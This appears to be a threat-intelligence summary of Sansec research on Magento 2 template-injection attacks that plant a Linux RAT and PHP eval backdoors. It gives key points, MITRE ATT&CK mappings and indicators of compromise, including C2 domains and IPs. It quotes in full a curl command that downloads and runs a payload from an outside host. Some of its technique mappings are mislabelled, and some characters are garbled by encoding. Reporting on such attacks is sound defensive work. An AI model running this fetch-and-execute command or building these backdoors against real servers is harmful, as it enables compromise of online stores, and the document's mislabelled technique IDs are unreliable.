Magento 2 template attacks now deploy backdoors via injected template code to install a Linux RAT and web backdoors, enabling persistent access and remote command control across potentially multi-node clusters. Variants include 223sam.jpg attack, health_check.php attack, and Interceptor.php attack, with indicators tying traffic to Bulgarian C2 domains and specific attacker infrastructure. #223sam.jpg_attack #health_check.php_attack #Interceptor.php_attack #FishPig #Magento #dev-clientservice.com #mailchimp-addons.com #allsecurehosting.com #Bulgaria
Keypoints
- Attacks unfold through interactive Magento checkout flows, not purely automated processes.
- The 223sam.jpg variant downloads a Linux executable named 223sam.jpg and runs it as a background RAT called βcli,β which polls a Bulgarian C2 server.
- The RAT has full access to the database and running PHP processes and can be injected across nodes in a multi-server Magento cluster.
- A health_check.php variation creates a backdoor using base64-encoded payloads and writes backdoors to pub/media, enabling command execution via POST.
- The interceptor-based attack replaces generated/frontend code (Interceptor.php) to host an eval backdoor that executes on every Magento page request, with a noted entry point URI.
- Multiple domains and IPs are associated with the campaigns, including dev-clientservice.com, mailchimp-addons.com, allsecurehosting.com, and IPs 45.128.199.3, 45.134.20.11, 86.104.15.60.
- Attack patterns resemble a prior FishPig attack, suggesting a potential shared actor; Sansec eComscan is highlighted as a detector for the injected RAT.
MITRE Techniques
- [T1105] Ingress Tool Transfer β The attacker downloads a Linux executable via curl and executes it. βThis downloads a Linux executable called 223sam.jpg and launches it as a background process called cli.β
- [T1059] Command and Scripting Interpreter β The payload is executed through shell commands and PHP elements, including base64_decode and eval usage. βcd pub; cd media;curl https://theroots.in/pub/media/avatar/223sam.jpg -o cli && chmod +x cli&&./cli;β and βevalβ backdoors are demonstrated.
- [T1574] Modify Existing Service β The attacker replaces the file path generated/code/Magento/Framework/App/FrontController/Interceptor.php with malicious code to enable ongoing backdoor access. βThis will execute another typical PHP eval backdoor:β
- [T1071.001] Web Protocols β The malware communicates with remote control servers (e.g., dev-clientservice.com, mailchimp-addons.com, allsecurehosting.com) and leverages HTTP-based techniques for command and control. βThe RAT invocation as β¦ is reminiscent of the backdoored FishPig attackβ and βThe malware is executed on every Magento page request.β
- [T1050] for the PHP-based backdoor usage with POST β The health_check.php backdoor accepts commands via POST, illustrating a server-side scripting execution vector. βIt contains a generic eval backdoor accepting commands via the POST ata parameter:β
- [T1584] Obtain Capabilities to compromise multi-server environments β The RAT can be injected on any node in a multi-server cluster, indicating lateral reach within a Magento deployment. βthe RAT can be injected on any of the nodes in a mult-server cluster environment.β
Indicators of Compromise
- [IP Address] 45.128.199.3, 45.134.20.11, 86.104.15.60 β observed as involved in the attack infrastructure
- [Domain/URL] dev-clientservice.com, mailchimp-addons.com, allsecurehosting.com β used as command-and-control or hosting for malicious payloads
- [File] 223sam.jpg β a Linux executable downloaded and executed by the attacker
- [File] health_check.php β a backdoor file created as part of the health_check variation
- [Path] pub/media/avatar/223sam.jpg and pub/media/health_check.php β deployment paths for the malware payloads
- [URI] POST /catalogsearch/result/?q=bestone β observed as a potential entry point for requests triggering the attacker payloads
Read more: https://sansec.io/research/magento-2-template-attacks